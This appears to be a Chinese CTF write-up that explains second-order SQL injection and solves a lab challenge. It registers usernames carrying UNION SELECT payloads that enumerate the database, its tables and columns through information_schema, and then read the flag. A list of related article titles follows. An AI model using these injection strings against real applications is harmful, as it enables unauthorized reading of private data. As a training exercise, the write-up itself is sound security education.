October 2019 Twice SQL Injection
October 2019 Twice SQL Injection
题目提示我们是二次注入(SQL注入(二次注入) - 知乎),二次注入漏洞是一种在Web应用程序中广泛存在的安全漏洞形式。
二次注入的原理:
在第一次进行数据库插入数据的时候,仅仅只是使用了addslashes或者是借助get_magic_quotes_gpc对其中的特殊字符进行了转义,但是addslashes有一个特点就是虽然参数在过滤后会添加"\"进行转义,但是"\"并不会插入到数据库中,再写入数据库的时候还是保留了原来的数据。
在将数据存入到了数据库中之后,开发者就认为数据是可信的。在下一次进行需要进行查询的时候直接从数据库中取除了“脏”数据,并没有进行进一步的检验和处理,这样就会造成SQL的二次注入。比如在第一次插入数据的时候,数据中有单引号,直接插入到了数据库中;然后再下一次使用中在拼凑的过程中就形成了二次注入。
随意注册一个账户然后登录,输入sql语句,发现服务器将我们的单引号用\转义,并没有过滤关键字
这时我们需要注册恶意用户名来登录获得我们想知道的内容
注册用户名为1' union select database() #,密码为a的用户
返回到登录页面输入刚才注册的用户名(1' union select database() #)和密码(a)
登录发现爆出了数据库ctftraining
使用同样的方法来爆表:用户名:1' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining' #,密码:a,注册登录
得到flag,news,users三个表
查一下flag表的字段:用户名:1' union select group_concat(column_name) from information_schema.columns where table_name='flag' #,密码:a,同样的注册登录
得到flag字段
查看一下flag字段的内容:用户名:1' union select flag from flag #,密码:a
得到flag
至此结束,撒花
October 2019 Twice SQL Injection相关推荐
- 综合技术--sql injection violation, part alway true condition not allow
2019独角兽企业重金招聘Python工程师标准>>> 今天遇到一个很奇怪的报错,信息如下 sql injection violation, part alway true cond ...
- ecshop /pick_out.php SQL Injection Vul By Local Variable Overriding
catalog 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考 1. 漏洞描述 在进行输入变量本地模拟注册的时候,没有进行有效的GPC模拟过 ...
- druid sql黑名单 报异常 sql injection violation, part alway true condition not allow
最近使用druid,发现阿里这个连接池 真的很好用,可以监控到连接池活跃连接数 开辟到多少个连接数 关闭了多少个,对于我在项目中查看错误 问题,很有帮助, 但是最近发现里面 有条sql语句 被拦截了, ...
- 网络***技术开篇——SQL Injection
http://www.cnblogs.com/rush/archive/2011/12/31/2309203.html 1.1.1 摘要 日前,国内最大的程序员社区CSDN网站的用户数据库被***公开 ...
- 【Web安全】关于SQL Injection和盲注的探索(DVWA)
文章目录 1 SQL Injection 1.1 解释 1.2 手工注入思路 1.3 low 2 SQL Injection (Blind) 2.1 SQL盲注与普通的SQL注入区别 2.2 low ...
- SQL Injection(SQL注入)介绍及SQL Injection攻击检测工具
1.关于SQL Injection 迄今为止,我基本没有看到谁写出一篇很完整的文章,或者说很成熟的解决方案(能做到 的人肯定很多,问题是没有流传开来,很遗憾) 我简单的说几点,希望启发大家思考,起到抛 ...
- DVWA学习(二)SQL Injection(Blind)
SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是 ...
- DVWA学习(一)SQL Injection
本文参考自https://www.jianshu.com/u/9dac23b54fba,根据自己的学习进度可能会有不同的地方,详细可以查看原文链接. SQL Injection,即SQL注入,是指攻击 ...
- Oracle Caused by: java.sql.SQLException: sql injection violation, syntax error: syntax error, expect
参考:https://blog.csdn.net/qq_36326332/article/details/102938147 https://blog.csdn.net/fly_captain/art ...
- nodejs mysql 注入_node.js sql 注入攻击防御方法 (sql Injection)
sql 注入的原理和方法应该都知道了,这里记录一下node-mysql提供的现成的api https://github.com/felixge/node-mysql node-mysql 提供了接口 ...
最新文章
- 一些很实用且必用的小脚本代码:
- cortex M内核优先级设置
- 在linux系统下安装两个nginx以及启动、停止、重起
- 角色关联权限操作-代码实现
- MySQL ALTER TABLE报错Duplicate entry 'xxx' for key 'PRIMARY'解决方法
- 在 Queue 中 poll()和 remove()有什么区别?
- Karabiner Elements使用技巧分享,帮您简单修改使用键位
- web前端开发技术实验与实践(读书笔记)
- 支持Android 11安卓Flash播放器终极版源码方案2022(2:网页中嵌入)
- 小常识:软件常见的各种版本英文缩写
- 怎么用计算机算lnx,ln计算(log计算器在线)
- Python入门:数据结构之字典(dict)(2)
- 如何清理多余的Windows桌面右键菜单
- sdcard里边的东西能删除吗_sdcard是什么意思(小米sdcard文件可以删除吗)
- 用canvas制作表情包
- 河南城建计算机学院的设备条件,河南城建学院仪器设备技术指标和功能要求
- Invalid default value for ‘updated_at‘
- 远程桌面看不到任务栏怎么办?
- 几种TFT-LCD屏幕接口的差别
- 【详细图解】一步一步教你自定义博客园(cnblog)界面